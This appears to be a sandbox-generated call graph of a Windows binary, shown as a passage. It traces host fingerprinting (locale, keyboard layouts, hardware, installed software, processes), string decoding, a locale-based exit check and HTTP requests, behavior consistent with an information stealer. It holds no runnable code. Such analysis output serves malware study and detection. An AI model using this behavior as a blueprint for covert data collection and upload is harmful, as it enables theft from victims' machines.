1449a9 14814->14815 14816 15a8a0 lstrcpy 14815->14816 14817 1449b2 14816->14817 14818 15a9b0 4 API calls 14817->14818 14819 1449d1 14818->14819 14820 15a8a0 lstrcpy 14819->14820 14821 1449da 14820->14821 14822 15a920 3 API calls 14821->14822 14823 1449f8 14822->14823 14824 15a8a0 lstrcpy 14823->14824 14826 144a01 14824->14826 14825->13847 14827 15a9b0 4 API calls 14826->14827 14828 144a20 14827->14828 14829 15a8a0 lstrcpy 14828->14829 14830 144a29 14829->14830 14831 15a9b0 4 API calls 14830->14831 14832 144a48 14831->14832 14833 15a8a0 lstrcpy 14832->14833 14834 144a51 14833->14834 
14835 15a9b0 4 API calls 14834->14835 14836 144a7d 14835->14836 14837 15a920 3 API calls 14836->14837 14838 144a84 14837->14838 14839 15a8a0 lstrcpy 14838->14839 14840 144a8d 14839->14840 14841 144aa3 InternetConnectA 14840->14841 14841->14797 14842 144ad3 HttpOpenRequestA 14841->14842 14844 144ebe InternetCloseHandle 14842->14844 14845 144b28 14842->14845 14844->14797 14846 15a9b0 4 API calls 14845->14846 14847 144b3c 14846->14847 14848 15a8a0 lstrcpy 14847->14848 14849 144b45 14848->14849 14850 15a920 3 API calls 14849->14850 14851 144b63 14850->14851 14852 15a8a0 lstrcpy 14851->14852 14853 144b6c 14852->14853 14854 15a9b0 4 API calls 14853->14854 14855 144b8b 14854->14855 14856 15a8a0 lstrcpy 14855->14856 14857 144b94 14856->14857 14858 15a9b0 4 API calls 14857->14858 14859 144bb5 14858->14859 14860 15a8a0 lstrcpy 14859->14860 14861 144bbe 14860->14861 14862 15a9b0 4 API calls 14861->14862 14863 144bde 14862->14863 14864 15a8a0 lstrcpy 14863->14864 14865 144be7 14864->14865 14866 15a9b0 4 API calls 14865->14866 14867 144c06 14866->14867 14868 15a8a0 lstrcpy 14867->14868 14869 144c0f 14868->14869 14870 15a920 3 API calls 14869->14870 14871 144c2d 14870->14871 14872 15a8a0 lstrcpy 14871->14872 14873 144c36 14872->14873 14874 15a9b0 4 API calls 14873->14874 14875 144c55 14874->14875 14876 15a8a0 lstrcpy 14875->14876 14877 144c5e 14876->14877 14878 15a9b0 4 API calls 14877->14878 14879 144c7d 14878->14879 14880 15a8a0 lstrcpy 14879->14880 14881 144c86 14880->14881 14882 15a920 3 API calls 14881->14882 14883 144ca4 14882->14883 14884 15a8a0 lstrcpy 14883->14884 14885 144cad 14884->14885 14886 15a9b0 4 API calls 14885->14886 14887 144ccc 14886->14887 14888 15a8a0 lstrcpy 14887->14888 14889 144cd5 14888->14889 14890 15a9b0 4 API calls 14889->14890 14891 144cf6 14890->14891 14892 15a8a0 lstrcpy 14891->14892 14893 144cff 14892->14893 14894 15a9b0 4 API calls 14893->14894 14895 144d1f 14894->14895 14896 15a8a0 lstrcpy 14895->14896 14897 144d28 14896->14897 14898 15a9b0 4 
API calls 14897->14898 14899 144d47 14898->14899 14900 15a8a0 lstrcpy 14899->14900 14901 144d50 14900->14901 14902 15a920 3 API calls 14901->14902 14903 144d6e 14902->14903 14904 15a8a0 lstrcpy 14903->14904 14905 144d77 14904->14905 14906 15a740 lstrcpy 14905->14906 14907 144d92 14906->14907 14908 15a920 3 API calls 14907->14908 14909 144db3 14908->14909 14910 15a920 3 API calls 14909->14910 14911 144dba 14910->14911 14912 15a8a0 lstrcpy 14911->14912 14913 144dc6 14912->14913 14914 144de7 lstrlen 14913->14914 14915 144dfa 14914->14915 14916 144e03 lstrlen 14915->14916 15855 15aad0 14916->15855 14918 144e13 HttpSendRequestA 14919 144e32 InternetReadFile 14918->14919 14920 144e67 InternetCloseHandle 14919->14920 14925 144e5e 14919->14925 14922 15a800 14920->14922 14922->14844 14923 15a9b0 4 API calls 14923->14925 14924 15a8a0 lstrcpy 14924->14925 14925->14919 14925->14920 14925->14923 14925->14924 15862 15aad0 14926->15862 14928 1517c4 StrCmpCA 14929 1517cf ExitProcess 14928->14929 14931 1517d7 14928->14931 14930 1519c2 14930->13849 14931->14930 14932 1518f1 StrCmpCA 14931->14932 14933 151951 StrCmpCA 14931->14933 14934 151970 StrCmpCA 14931->14934 14935 151913 StrCmpCA 14931->14935 14936 151932 StrCmpCA 14931->14936 14937 15185d StrCmpCA 14931->14937 14938 15187f StrCmpCA 14931->14938 14939 1518ad StrCmpCA 14931->14939 14940 1518cf StrCmpCA 14931->14940 14941 15a820 lstrlen lstrcpy 14931->14941 14932->14931 14933->14931 14934->14931 14935->14931 14936->14931 14937->14931 14938->14931 14939->14931 14940->14931 14941->14931 14943 15a7a0 lstrcpy 14942->14943 14944 145979 14943->14944 14945 1447b0 2 API calls 14944->14945 14946 145985 14945->14946 14947 15a740 lstrcpy 14946->14947 14948 1459ba 14947->14948 14949 15a740 lstrcpy 14948->14949 14950 1459c7 14949->14950 14951 15a740 lstrcpy 14950->14951 14952 1459d4 14951->14952 14953 15a740 lstrcpy 14952->14953 14954 1459e1 14953->14954 14955 15a740 lstrcpy 14954->14955 14956 1459ee InternetOpenA StrCmpCA 14955->14956 14957 
145a1d 14956->14957 14958 145fc3 InternetCloseHandle 14957->14958 14959 158b60 3 API calls 14957->14959 14961 145fe0 14958->14961 14960 145a3c 14959->14960 14962 15a920 3 API calls 14960->14962 14963 149ac0 4 API calls 14961->14963 14964 145a4f 14962->14964 14965 145fe6 14963->14965 14966 15a8a0 lstrcpy 14964->14966 14967 15a820 2 API calls 14965->14967 14969 14601f ctype 14965->14969 14971 145a58 14966->14971 14968 145ffd 14967->14968 14970 15a9b0 4 API calls 14968->14970 14973 15a7a0 lstrcpy 14969->14973 14972 146013 14970->14972 14975 15a9b0 4 API calls 14971->14975 14974 15a8a0 lstrcpy 14972->14974 14983 14604f 14973->14983 14974->14969 14976 145a82 14975->14976 14977 15a8a0 lstrcpy 14976->14977 14978 145a8b 14977->14978 14979 15a9b0 4 API calls 14978->14979 14980 145aaa 14979->14980 14981 15a8a0 lstrcpy 14980->14981 14982 145ab3 14981->14982 14984 15a920 3 API calls 14982->14984 14983->13855 14985 145ad1 14984->14985 14986 15a8a0 lstrcpy 14985->14986 14987 145ada 14986->14987 14988 15a9b0 4 API calls 14987->14988 14989 145af9 14988->14989 14990 15a8a0 lstrcpy 14989->14990 14991 145b02 14990->14991 14992 15a9b0 4 API calls 14991->14992 14993 145b21 14992->14993 14994 15a8a0 lstrcpy 14993->14994 14995 145b2a 14994->14995 14996 15a9b0 4 API calls 14995->14996 14997 145b56 14996->14997 14998 15a920 3 API calls 14997->14998 14999 145b5d 14998->14999 15000 15a8a0 lstrcpy 14999->15000 15001 145b66 15000->15001 15002 145b7c InternetConnectA 15001->15002 15002->14958 15003 145bac HttpOpenRequestA 15002->15003 15005 145fb6 InternetCloseHandle 15003->15005 15006 145c0b 15003->15006 15005->14958 15007 15a9b0 4 API calls 15006->15007 15008 145c1f 15007->15008 15009 15a8a0 lstrcpy 15008->15009 15010 145c28 15009->15010 15011 15a920 3 API calls 15010->15011 15012 145c46 15011->15012 15013 15a8a0 lstrcpy 15012->15013 15014 145c4f 15013->15014 15015 15a9b0 4 API calls 15014->15015 15016 145c6e 15015->15016 15017 15a8a0 lstrcpy 15016->15017 15018 145c77 15017->15018 15019 
15a9b0 4 API calls 15018->15019 15020 145c98 15019->15020 15021 15a8a0 lstrcpy 15020->15021 15022 145ca1 15021->15022 15023 15a9b0 4 API calls 15022->15023 15024 145cc1 15023->15024 15025 15a8a0 lstrcpy 15024->15025 15026 145cca 15025->15026 15027 15a9b0 4 API calls 15026->15027 15028 145ce9 15027->15028 15029 15a8a0 lstrcpy 15028->15029 15030 145cf2 15029->15030 15031 15a920 3 API calls 15030->15031 15032 145d10 15031->15032 15033 15a8a0 lstrcpy 15032->15033 15034 145d19 15033->15034 15035 15a9b0 4 API calls 15034->15035 15036 145d38 15035->15036 15037 15a8a0 lstrcpy 15036->15037 15038 145d41 15037->15038 15039 15a9b0 4 API calls 15038->15039 15040 145d60 15039->15040 15041 15a8a0 lstrcpy 15040->15041 15042 145d69 15041->15042 15043 15a920 3 API calls 15042->15043 15044 145d87 15043->15044 15045 15a8a0 lstrcpy 15044->15045 15046 145d90 15045->15046 15047 15a9b0 4 API calls 15046->15047 15048 145daf 15047->15048 15049 15a8a0 lstrcpy 15048->15049 15050 145db8 15049->15050 15051 15a9b0 4 API calls 15050->15051 15052 145dd9 15051->15052 15053 15a8a0 lstrcpy 15052->15053 15054 145de2 15053->15054 15055 15a9b0 4 API calls 15054->15055 15056 145e02 15055->15056 15057 15a8a0 lstrcpy 15056->15057 15058 145e0b 15057->15058 15059 15a9b0 4 API calls 15058->15059 15060 145e2a 15059->15060 15061 15a8a0 lstrcpy 15060->15061 15062 145e33 15061->15062 15063 15a920 3 API calls 15062->15063 15064 145e54 15063->15064 15065 15a8a0 lstrcpy 15064->15065 15066 145e5d 15065->15066 15067 145e70 lstrlen 15066->15067 15863 15aad0 15067->15863 15069 145e81 lstrlen GetProcessHeap RtlAllocateHeap 15864 15aad0 15069->15864 15071 145eae lstrlen 15072 145ebe 15071->15072 15073 145ed7 lstrlen 15072->15073 15074 145ee7 15073->15074 15075 145ef0 lstrlen 15074->15075 15076 145f04 15075->15076 15077 145f1a lstrlen 15076->15077 15865 15aad0 15077->15865 15079 145f2a HttpSendRequestA 15080 145f35 InternetReadFile 15079->15080 15081 145f6a InternetCloseHandle 15080->15081 15085 145f61 15080->15085 
15081->15005 15083 15a9b0 4 API calls 15083->15085 15084 15a8a0 lstrcpy 15084->15085 15085->15080 15085->15081 15085->15083 15085->15084 15089 151077 15086->15089 15087 151151 15087->13857 15088 15a820 lstrlen lstrcpy 15088->15089 15089->15087 15089->15088 15095 150db7 15090->15095 15091 150f17 15091->13865 15092 150ea4 StrCmpCA 15092->15095 15093 150e27 StrCmpCA 15093->15095 15094 150e67 StrCmpCA 15094->15095 15095->15091 15095->15092 15095->15093 15095->15094 15096 15a820 lstrlen lstrcpy 15095->15096 15096->15095 15098 150f67 15097->15098 15099 150fb2 StrCmpCA 15098->15099 15100 151044 15098->15100 15101 15a820 lstrlen lstrcpy 15098->15101 15099->15098 15100->13873 15101->15098 15103 15a740 lstrcpy 15102->15103 15104 151a26 15103->15104 15105 15a9b0 4 API calls 15104->15105 15106 151a37 15105->15106 15107 15a8a0 lstrcpy 15106->15107 15108 151a40 15107->15108 15109 15a9b0 4 API calls 15108->15109 15110 151a5b 15109->15110 15111 15a8a0 lstrcpy 15110->15111 15112 151a64 15111->15112 15113 15a9b0 4 API calls 15112->15113 15114 151a7d 15113->15114 15115 15a8a0 lstrcpy 15114->15115 15116 151a86 15115->15116 15117 15a9b0 4 API calls 15116->15117 15118 151aa1 15117->15118 15119 15a8a0 lstrcpy 15118->15119 15120 151aaa 15119->15120 15121 15a9b0 4 API calls 15120->15121 15122 151ac3 15121->15122 15123 15a8a0 lstrcpy 15122->15123 15124 151acc 15123->15124 15125 15a9b0 4 API calls 15124->15125 15126 151ae7 15125->15126 15127 15a8a0 lstrcpy 15126->15127 15128 151af0 15127->15128 15129 15a9b0 4 API calls 15128->15129 15130 151b09 15129->15130 15131 15a8a0 lstrcpy 15130->15131 15132 151b12 15131->15132 15133 15a9b0 4 API calls 15132->15133 15134 151b2d 15133->15134 15135 15a8a0 lstrcpy 15134->15135 15136 151b36 15135->15136 15137 15a9b0 4 API calls 15136->15137 15138 151b4f 15137->15138 15139 15a8a0 lstrcpy 15138->15139 15140 151b58 15139->15140 15141 15a9b0 4 API calls 15140->15141 15142 151b76 15141->15142 15143 15a8a0 lstrcpy 15142->15143 15144 151b7f 15143->15144 15145 
157500 6 API calls 15144->15145 15146 151b96 15145->15146 15147 15a920 3 API calls 15146->15147 15148 151ba9 15147->15148 15149 15a8a0 lstrcpy 15148->15149 15150 151bb2 15149->15150 15151 15a9b0 4 API calls 15150->15151 15152 151bdc 15151->15152 15153 15a8a0 lstrcpy 15152->15153 15154 151be5 15153->15154 15155 15a9b0 4 API calls 15154->15155 15156 151c05 15155->15156 15157 15a8a0 lstrcpy 15156->15157 15158 151c0e 15157->15158 15866 157690 GetProcessHeap RtlAllocateHeap 15158->15866 15161 15a9b0 4 API calls 15162 151c2e 15161->15162 15163 15a8a0 lstrcpy 15162->15163 15164 151c37 15163->15164 15165 15a9b0 4 API calls 15164->15165 15166 151c56 15165->15166 15167 15a8a0 lstrcpy 15166->15167 15168 151c5f 15167->15168 15169 15a9b0 4 API calls 15168->15169 15170 151c80 15169->15170 15171 15a8a0 lstrcpy 15170->15171 15172 151c89 15171->15172 15873 1577c0 GetCurrentProcess IsWow64Process 15172->15873 15175 15a9b0 4 API calls 15176 151ca9 15175->15176 15177 15a8a0 lstrcpy 15176->15177 15178 151cb2 15177->15178 15179 15a9b0 4 API calls 15178->15179 15180 151cd1 15179->15180 15181 15a8a0 lstrcpy 15180->15181 15182 151cda 15181->15182 15183 15a9b0 4 API calls 15182->15183 15184 151cfb 15183->15184 15185 15a8a0 lstrcpy 15184->15185 15186 151d04 15185->15186 15187 157850 3 API calls 15186->15187 15188 151d14 15187->15188 15189 15a9b0 4 API calls 15188->15189 15190 151d24 15189->15190 15191 15a8a0 lstrcpy 15190->15191 15192 151d2d 15191->15192 15193 15a9b0 4 API calls 15192->15193 15194 151d4c 15193->15194 15195 15a8a0 lstrcpy 15194->15195 15196 151d55 15195->15196 15197 15a9b0 4 API calls 15196->15197 15198 151d75 15197->15198 15199 15a8a0 lstrcpy 15198->15199 15200 151d7e 15199->15200 15201 1578e0 3 API calls 15200->15201 15202 151d8e 15201->15202 15203 15a9b0 4 API calls 15202->15203 15204 151d9e 15203->15204 15205 15a8a0 lstrcpy 15204->15205 15206 151da7 15205->15206 15207 15a9b0 4 API calls 15206->15207 15208 151dc6 15207->15208 15209 15a8a0 lstrcpy 15208->15209 15210 151dcf 
15209->15210 15211 15a9b0 4 API calls 15210->15211 15212 151df0 15211->15212 15213 15a8a0 lstrcpy 15212->15213 15214 151df9 15213->15214 15875 157980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15214->15875 15217 15a9b0 4 API calls 15218 151e19 15217->15218 15219 15a8a0 lstrcpy 15218->15219 15220 151e22 15219->15220 15221 15a9b0 4 API calls 15220->15221 15222 151e41 15221->15222 15223 15a8a0 lstrcpy 15222->15223 15224 151e4a 15223->15224 15225 15a9b0 4 API calls 15224->15225 15226 151e6b 15225->15226 15227 15a8a0 lstrcpy 15226->15227 15228 151e74 15227->15228 15877 157a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15228->15877 15231 15a9b0 4 API calls 15232 151e94 15231->15232 15233 15a8a0 lstrcpy 15232->15233 15234 151e9d 15233->15234 15235 15a9b0 4 API calls 15234->15235 15236 151ebc 15235->15236 15237 15a8a0 lstrcpy 15236->15237 15238 151ec5 15237->15238 15239 15a9b0 4 API calls 15238->15239 15240 151ee5 15239->15240 15241 15a8a0 lstrcpy 15240->15241 15242 151eee 15241->15242 15880 157b00 GetUserDefaultLocaleName 15242->15880 15245 15a9b0 4 API calls 15246 151f0e 15245->15246 15247 15a8a0 lstrcpy 15246->15247 15248 151f17 15247->15248 15249 15a9b0 4 API calls 15248->15249 15250 151f36 15249->15250 15251 15a8a0 lstrcpy 15250->15251 15252 151f3f 15251->15252 15253 15a9b0 4 API calls 15252->15253 15254 151f60 15253->15254 15255 15a8a0 lstrcpy 15254->15255 15256 151f69 15255->15256 15884 157b90 15256->15884 15258 151f80 15259 15a920 3 API calls 15258->15259 15260 151f93 15259->15260 15261 15a8a0 lstrcpy 15260->15261 15262 151f9c 15261->15262 15263 15a9b0 4 API calls 15262->15263 15264 151fc6 15263->15264 15265 15a8a0 lstrcpy 15264->15265 15266 151fcf 15265->15266 15267 15a9b0 4 API calls 15266->15267 15268 151fef 15267->15268 15269 15a8a0 lstrcpy 15268->15269 15270 151ff8 15269->15270 15896 157d80 GetSystemPowerStatus 15270->15896 15273 15a9b0 4 API calls 15274 152018 15273->15274 15275 15a8a0 lstrcpy 15274->15275 15276 152021 15275->15276 15277 
15a9b0 4 API calls 15276->15277 15278 152040 15277->15278 15279 15a8a0 lstrcpy 15278->15279 15280 152049 15279->15280 15281 15a9b0 4 API calls 15280->15281 15282 15206a 15281->15282 15283 15a8a0 lstrcpy 15282->15283 15284 152073 15283->15284 15285 15207e GetCurrentProcessId 15284->15285 15898 159470 OpenProcess 15285->15898 15288 15a920 3 API calls 15289 1520a4 15288->15289 15290 15a8a0 lstrcpy 15289->15290 15291 1520ad 15290->15291 15292 15a9b0 4 API calls 15291->15292 15293 1520d7 15292->15293 15294 15a8a0 lstrcpy 15293->15294 15295 1520e0 15294->15295 15296 15a9b0 4 API calls 15295->15296 15297 152100 15296->15297 15298 15a8a0 lstrcpy 15297->15298 15299 152109 15298->15299 15903 157e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15299->15903 15302 15a9b0 4 API calls 15303 152129 15302->15303 15304 15a8a0 lstrcpy 15303->15304 15305 152132 15304->15305 15306 15a9b0 4 API calls 15305->15306 15307 152151 15306->15307 15308 15a8a0 lstrcpy 15307->15308 15309 15215a 15308->15309 15310 15a9b0 4 API calls 15309->15310 15311 15217b 15310->15311 15312 15a8a0 lstrcpy 15311->15312 15313 152184 15312->15313 15907 157f60 15313->15907 15316 15a9b0 4 API calls 15317 1521a4 15316->15317 15318 15a8a0 lstrcpy 15317->15318 15319 1521ad 15318->15319 15320 15a9b0 4 API calls 15319->15320 15321 1521cc 15320->15321 15322 15a8a0 lstrcpy 15321->15322 15323 1521d5 15322->15323 15324 15a9b0 4 API calls 15323->15324 15325 1521f6 15324->15325 15326 15a8a0 lstrcpy 15325->15326 15327 1521ff 15326->15327 15920 157ed0 GetSystemInfo wsprintfA 15327->15920 15330 15a9b0 4 API calls 15331 15221f 15330->15331 15332 15a8a0 lstrcpy 15331->15332 15333 152228 15332->15333 15334 15a9b0 4 API calls 15333->15334 15335 152247 15334->15335 15336 15a8a0 lstrcpy 15335->15336 15337 152250 15336->15337 15338 15a9b0 4 API calls 15337->15338 15339 152270 15338->15339 15340 15a8a0 lstrcpy 15339->15340 15341 152279 15340->15341 15922 158100 GetProcessHeap RtlAllocateHeap 15341->15922 15344 15a9b0 4 API calls 15345 
152299 15344->15345 15346 15a8a0 lstrcpy 15345->15346 15347 1522a2 15346->15347 15348 15a9b0 4 API calls 15347->15348 15349 1522c1 15348->15349 15350 15a8a0 lstrcpy 15349->15350 15351 1522ca 15350->15351 15352 15a9b0 4 API calls 15351->15352 15353 1522eb 15352->15353 15354 15a8a0 lstrcpy 15353->15354 15355 1522f4 15354->15355 15928 1587c0 15355->15928 15358 15a920 3 API calls 15359 15231e 15358->15359 15360 15a8a0 lstrcpy 15359->15360 15361 152327 15360->15361 15362 15a9b0 4 API calls 15361->15362 15363 152351 15362->15363 15364 15a8a0 lstrcpy 15363->15364 15365 15235a 15364->15365 15366 15a9b0 4 API calls 15365->15366 15367 15237a 15366->15367 15368 15a8a0 lstrcpy 15367->15368 15369 152383 15368->15369 15370 15a9b0 4 API calls 15369->15370 15371 1523a2 15370->15371 15372 15a8a0 lstrcpy 15371->15372 15373 1523ab 15372->15373 15933 1581f0 15373->15933 15375 1523c2 15376 15a920 3 API calls 15375->15376 15377 1523d5 15376->15377 15378 15a8a0 lstrcpy 15377->15378 15379 1523de 15378->15379 15380 15a9b0 4 API calls 15379->15380 15381 15240a 15380->15381 15382 15a8a0 lstrcpy 15381->15382 15383 152413 15382->15383 15384 15a9b0 4 API calls 15383->15384 15385 152432 15384->15385 15386 15a8a0 lstrcpy 15385->15386 15387 15243b 15386->15387 15388 15a9b0 4 API calls 15387->15388 15389 15245c 15388->15389 15390 15a8a0 lstrcpy 15389->15390 15391 152465 15390->15391 15392 15a9b0 4 API calls 15391->15392 15393 152484 15392->15393 15394 15a8a0 lstrcpy 15393->15394 15395 15248d 15394->15395 15396 15a9b0 4 API calls 15395->15396 15397 1524ae 15396->15397 15398 15a8a0 lstrcpy 15397->15398 15399 1524b7 15398->15399 15941 158320 15399->15941 15401 1524d3 15402 15a920 3 API calls 15401->15402 15403 1524e6 15402->15403 15404 15a8a0 lstrcpy 15403->15404 15405 1524ef 15404->15405 15406 15a9b0 4 API calls 15405->15406 15407 152519 15406->15407 15408 15a8a0 lstrcpy 15407->15408 15409 152522 15408->15409 15410 15a9b0 4 API calls 15409->15410 15411 152543 15410->15411 15412 15a8a0 lstrcpy 
15411->15412 15413 15254c 15412->15413 15414 158320 17 API calls 15413->15414 15415 152568 15414->15415 15416 15a920 3 API calls 15415->15416 15417 15257b 15416->15417 15418 15a8a0 lstrcpy 15417->15418 15419 152584 15418->15419 15420 15a9b0 4 API calls 15419->15420 15421 1525ae 15420->15421 15422 15a8a0 lstrcpy 15421->15422 15423 1525b7 15422->15423 15424 15a9b0 4 API calls 15423->15424 15425 1525d6 15424->15425 15426 15a8a0 lstrcpy 15425->15426 15427 1525df 15426->15427 15428 15a9b0 4 API calls 15427->15428 15429 152600 15428->15429 15430 15a8a0 lstrcpy 15429->15430 15431 152609 15430->15431 15977 158680 15431->15977 15433 152620 15434 15a920 3 API calls 15433->15434 15435 152633 15434->15435 15436 15a8a0 lstrcpy 15435->15436 15437 15263c 15436->15437 15438 15265a lstrlen 15437->15438 15439 15266a 15438->15439 15440 15a740 lstrcpy 15439->15440 15441 15267c 15440->15441 15442 141590 lstrcpy 15441->15442 15443 15268d 15442->15443 15987 155190 15443->15987 15445 152699 15445->13877 16175 15aad0 15446->16175 15448 145009 InternetOpenUrlA 15449 145021 15448->15449 15450 1450a0 InternetCloseHandle InternetCloseHandle 15449->15450 15451 14502a InternetReadFile 15449->15451 15452 1450ec 15450->15452 15451->15449 15452->13881 16176 1498d0 15453->16176 15455 150759 15456 15077d 15455->15456 15457 150a38 15455->15457 15460 150799 StrCmpCA 15456->15460 15458 141590 lstrcpy 15457->15458 15459 150a49 15458->15459 16352 150250 15459->16352 15462 150843 15460->15462 15463 1507a8 15460->15463 15466 150865 StrCmpCA 15462->15466 15465 15a7a0 lstrcpy 15463->15465 15467 1507c3 15465->15467 15468 150874 15466->15468 15505 15096b 15466->15505 15469 141590 lstrcpy 15467->15469 15470 15a740 lstrcpy 15468->15470 15471 15080c 15469->15471 15473 150881 15470->15473 15474 15a7a0 lstrcpy 15471->15474 15472 15099c StrCmpCA 15475 1509ab 15472->15475 15494 150a2d 15472->15494 15476 15a9b0 4 API calls 15473->15476 15477 150823 15474->15477 15479 141590 lstrcpy 15475->15479 15480 1508ac 
15476->15480 15478 15a7a0 lstrcpy 15477->15478 15481 15083e 15478->15481 15482 1509f4 15479->15482 15483 15a920 3 API calls 15480->15483 16179 14fb00 15481->16179 15485 15a7a0 lstrcpy 15482->15485 15486 1508b3 15483->15486 15487 150a0d 15485->15487 15488 15a9b0 4 API calls 15486->15488 15489 15a7a0 lstrcpy 15487->15489 15490 1508ba 15488->15490 15492 150a28 15489->15492 15491 15a8a0 lstrcpy 15490->15491 16295 150030 15492->16295 15494->13885 15505->15472 15827 15a7a0 lstrcpy 15826->15827 15828 141683 15827->15828 15829 15a7a0 lstrcpy 15828->15829 15830 141695 15829->15830 15831 15a7a0 lstrcpy 15830->15831 15832 1416a7 15831->15832 15833 15a7a0 lstrcpy 15832->15833 15834 1415a3 15833->15834 15834->14708 15836 1447c6 15835->15836 15837 144838 lstrlen 15836->15837 15861 15aad0 15837->15861 15839 144848 InternetCrackUrlA 15840 144867 15839->15840 15840->14785 15842 15a740 lstrcpy 15841->15842 15843 158b74 15842->15843 15844 15a740 lstrcpy 15843->15844 15845 158b82 GetSystemTime 15844->15845 15847 158b99 15845->15847 15846 15a7a0 lstrcpy 15848 158bfc 15846->15848 15847->15846 15848->14800 15850 15a931 15849->15850 15851 15a988 15850->15851 15854 15a968 lstrcpy lstrcat 15850->15854 15852 15a7a0 lstrcpy 15851->15852 15853 15a994 15852->15853 15853->14803 15854->15851 15855->14918 15857 149af9 LocalAlloc 15856->15857 15858 144eee 15856->15858 15857->15858 15859 149b14 CryptStringToBinaryA 15857->15859 15858->14806 15858->14808 15859->15858 15860 149b39 LocalFree 15859->15860 15860->15858 15861->15839 15862->14928 15863->15069 15864->15071 15865->15079 15994 1577a0 15866->15994 15869 1576c6 RegOpenKeyExA 15871 157704 RegCloseKey 15869->15871 15872 1576e7 RegQueryValueExA 15869->15872 15870 151c1e 15870->15161 15871->15870 15872->15871 15874 151c99 15873->15874 15874->15175 15876 151e09 15875->15876 15876->15217 15878 151e84 15877->15878 15879 157a9a wsprintfA 15877->15879 15878->15231 15879->15878 15881 157b4d 15880->15881 15882 151efe 15880->15882 16001 158d20 LocalAlloc 
CharToOemW 15881->16001 15882->15245 15885 15a740 lstrcpy 15884->15885 15886 157bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15885->15886 15893 157c25 15886->15893 15887 157c46 GetLocaleInfoA 15887->15893 15888 157d18 15889 157d1e LocalFree 15888->15889 15890 157d28 15888->15890 15889->15890 15892 15a7a0 lstrcpy 15890->15892 15891 15a9b0 lstrcpy lstrlen lstrcpy lstrcat 15891->15893 15894 157d37 15892->15894 15893->15887 15893->15888 15893->15891 15895 15a8a0 lstrcpy 15893->15895 15894->15258 15895->15893 15897 152008 15896->15897 15897->15273 15899 1594b5 15898->15899 15900 159493 GetModuleFileNameExA CloseHandle 15898->15900 15901 15a740 lstrcpy 15899->15901 15900->15899 15902 152091 15901->15902 15902->15288 15904 152119 15903->15904 15905 157e68 RegQueryValueExA 15903->15905 15904->15302 15906 157e8e RegCloseKey 15905->15906 15906->15904 15908 157fb9 GetLogicalProcessorInformationEx 15907->15908 15909 157fd8 GetLastError 15908->15909 15912 158029 15908->15912 15916 157fe3 15909->15916 15919 158022 15909->15919 15913 1589f0 2 API calls 15912->15913 15915 15807b 15913->15915 15914 1589f0 2 API calls 15917 152194 15914->15917 15918 158084 wsprintfA 15915->15918 15915->15919 15916->15908 15916->15917 16002 1589f0 15916->16002 16005 158a10 GetProcessHeap RtlAllocateHeap 15916->16005 15917->15316 15918->15917 15919->15914 15919->15917 15921 15220f 15920->15921 15921->15330 15923 1589b0 15922->15923 15924 15814d GlobalMemoryStatusEx 15923->15924 15927 158163 __aulldiv 15924->15927 15925 15819b wsprintfA 15926 152289 15925->15926 15926->15344 15927->15925 15929 1587fb GetProcessHeap RtlAllocateHeap wsprintfA 15928->15929 15931 15a740 lstrcpy 15929->15931 15932 15230b 15931->15932 15932->15358 15934 15a740 lstrcpy 15933->15934 15940 158229 15934->15940 15935 158263 15936 15a7a0 lstrcpy 15935->15936 15938 1582dc 15936->15938 15937 15a9b0 lstrcpy lstrlen lstrcpy lstrcat 15937->15940 15938->15375 15939 15a8a0 lstrcpy 15939->15940 15940->15935 15940->15937 
15940->15939 15942 15a740 lstrcpy 15941->15942 15943 15835c RegOpenKeyExA 15942->15943 15944 1583d0 15943->15944 15945 1583ae 15943->15945 15947 158613 RegCloseKey 15944->15947 15948 1583f8 RegEnumKeyExA 15944->15948 15946 15a7a0 lstrcpy 15945->15946 15957 1583bd 15946->15957 15951 15a7a0 lstrcpy 15947->15951 15949 15843f wsprintfA RegOpenKeyExA 15948->15949 15950 15860e 15948->15950 15952 158485 RegCloseKey RegCloseKey 15949->15952 15953 1584c1 RegQueryValueExA 15949->15953 15950->15947 15951->15957 15954 15a7a0 lstrcpy 15952->15954 15955 158601 RegCloseKey 15953->15955 15956 1584fa lstrlen 15953->15956 15954->15957 15955->15950 15956->15955 15958 158510 15956->15958 15957->15401 15959 15a9b0 4 API calls 15958->15959 15960 158527 15959->15960 15961 15a8a0 lstrcpy 15960->15961 15962 158533 15961->15962 15963 15a9b0 4 API calls 15962->15963 15964 158557 15963->15964 15965 15a8a0 lstrcpy 15964->15965 15966 158563 15965->15966 15967 15856e RegQueryValueExA 15966->15967 15967->15955 15968 1585a3 15967->15968 15969 15a9b0 4 API calls 15968->15969 15970 1585ba 15969->15970 15971 15a8a0 lstrcpy 15970->15971 15972 1585c6 15971->15972 15973 15a9b0 4 API calls 15972->15973 15974 1585ea 15973->15974 15975 15a8a0 lstrcpy 15974->15975 15976 1585f6 15975->15976 15976->15955 15978 15a740 lstrcpy 15977->15978 15979 1586bc CreateToolhelp32Snapshot Process32First 15978->15979 15980 15875d CloseHandle 15979->15980 15981 1586e8 Process32Next 15979->15981 15982 15a7a0 lstrcpy 15980->15982 15981->15980 15986 1586fd 15981->15986 15985 158776 15982->15985 15983 15a9b0 lstrcpy lstrlen lstrcpy lstrcat 15983->15986 15984 15a8a0 lstrcpy 15984->15986 15985->15433 15986->15981 15986->15983 15986->15984 15988 15a7a0 lstrcpy 15987->15988 15989 1551b5 15988->15989 15990 141590 lstrcpy 15989->15990 15991 1551c6 15990->15991 16006 145100 15991->16006 15993 1551cf 15993->15445 15997 157720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15994->15997 15996 1576b9 15996->15869 15996->15870 15998 157765 
